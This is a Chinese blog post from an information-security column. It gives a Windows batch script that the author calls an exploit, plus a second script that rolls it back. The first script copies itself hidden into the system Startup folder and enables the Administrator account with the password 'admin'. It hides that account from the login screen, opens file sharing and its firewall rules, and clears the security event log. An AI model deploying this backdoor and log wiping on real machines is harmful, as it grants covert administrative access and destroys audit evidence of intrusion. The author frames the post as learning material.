[批处理]开启文件共享服务

最新推荐文章于 2022-02-24 20:49:42 发布

v1nw1n

最新推荐文章于 2022-02-24 20:49:42 发布

阅读量1.3k

点赞数

分类专栏：信息安全文章标签： windows 安全

本文链接：https://blog.csdn.net/Vincent_zhang1949/article/details/113817173

版权

信息安全专栏收录该内容

15 篇文章 1 订阅

订阅专栏

脚本功能
实现开机自动启用主机文件共享服务，并启用管理员账户，开启防火墙文件共享配置，并为管理员账户和脚本文件做了隐藏，以及日志清除。

第二段脚本用于恢复操作。回显还原进程的信息交互。

@echo off&color 0A
rem call smbExploitRelieve.bat

rem change code page into utf-8
chcp 65001 >nul 2>nul 

rem change command directory into the dir where the current script in 
cd /d %~dp0 >nul 2>nul 
cd 

rem copy to startmenu of user
rem copy smbExploit.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"  >nul 2>nul 

rem copy to startmenu of system
copy smbExploit.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" >nul 2>nul

rem modify file attribute
rem attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" >nul 2>nul 

rem system startmenu
attrib +S +H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" >nul 2>nul  

rem active administrator
net user administrator admin /active:yes >nul 2>nul 


rem add reg to hide administrator account on system login window
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator /t REG_DWORD /d 0 >nul 2>nul  

rem modify ACL of file
rem echo Y|cacls "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" /G administrator:F >nul 2>nul 

rem system directory
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G administrator:F >nul 2>nul 

rem start net share service
net start FDResPub >nul 2>nul 

rem enable firewall config about files share
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=yes >nul 2>nul 

rem clear log
wevtutil cl security >nul 2>nul

@echo off&color 0A

echo ------modifing ACL
rem echo Y|cacls "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" /G everyone:F 1>nul  
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G everyone:F 1>nul 2>>%userprofile%\errInfo.txt
rem 成功处理返回0
rem 找不到文件返回2


echo ------modifing file attributes
rem attrib -S -H "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
attrib -S -H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem 成功处理返回0
rem 找不到文件返回0


echo ------baning administrator account
net user administrator  /active:NO 1>nul 2>>%userprofile%\errInfo.txt
rem 拒绝访问放回2
rem 命令成功返回0

echo ------deleting correlative reg object
echo yes|reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator  1>nul 2>>%userprofile%\errInfo.txt
rem 操作成功返回0
rem 拒绝访问返回1
rem 找不到表项返回1

echo ------deleting exp
rem del "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem errorlevel = 0
rem 找不到文件返回0
rem 执行成功返回0

rem stop service
net stop fdrespub 1>nul 2>>%userprofile%\errInfo.txt
rem 服务未启动返回2
rem 执行成功返回0

rem reset firewall rules
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=no 1>nul 2>>%userprofile%\errInfo.txt 
rem 权限不足返回1
rem 成功更新规则返回0

for %%a in ("%userprofile%\errInfo.txt") do (
     if "%%~za" equ "0" (
       rem 如果没有完全回滚侧回显下述消息
       echo :::::::::::::::::::::::::::::::::::::::::::::::
       echo smbExploit deleted，and rollbacked the operation of exp,have a good day!
        ) else (
       echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
       echo :::::::::::::here is the correlative error:::::::::::::::::::::
       echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
       type %userprofile%\errInfo.txt
       rem 否则检查相关信息
     )
)

choice /C YN /T 5 /M "是否继续检查相关信息?" /D Y
if errorlevel 2 (
del %userprofile%\errInfo.txt
exit)
if errorlevel  1 (
echo ::::::::::::::::::::start information check::::::::::::::::::::::::::::::::
echo ------check administrator account
net user administrator
echo ------check correlative reg object
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts" 
echo ------check the state of net share service
sc query FDResPub|find /I "state" 
echo ------check firewall rules
netsh advfirewall firewall show rule name="文件和打印机共享(回显请求 - ICMPv4-In)" verbose
echo ------check exp file
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" /A|find "smbExploit.bat" 
rem dir "%userprofile%\Start Menu\Programs\Startup" /A|find "smbExploit.bat" 
)

del %userprofile%\errInfo.txt
pause

v1nw1n

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
[批处理]开启文件共享服务

该笔记记录学习过程自己编写的一个exp脚本，脚本功能实现开机自动启用主机文件共享服务，并启用管理员账户，开启防火墙文件共享配置，并为管理员账户和脚本文件做了隐藏，以及日志清楚。第二段脚本用于恢复exp脚本的操作。并实现了还原进程的详细信息交互。@echo off&color 0Arem call smbExploitRelieve.batrem change code page into utf-8chcp 65001 >nul 2>nul rem change comm
复制链接

扫一扫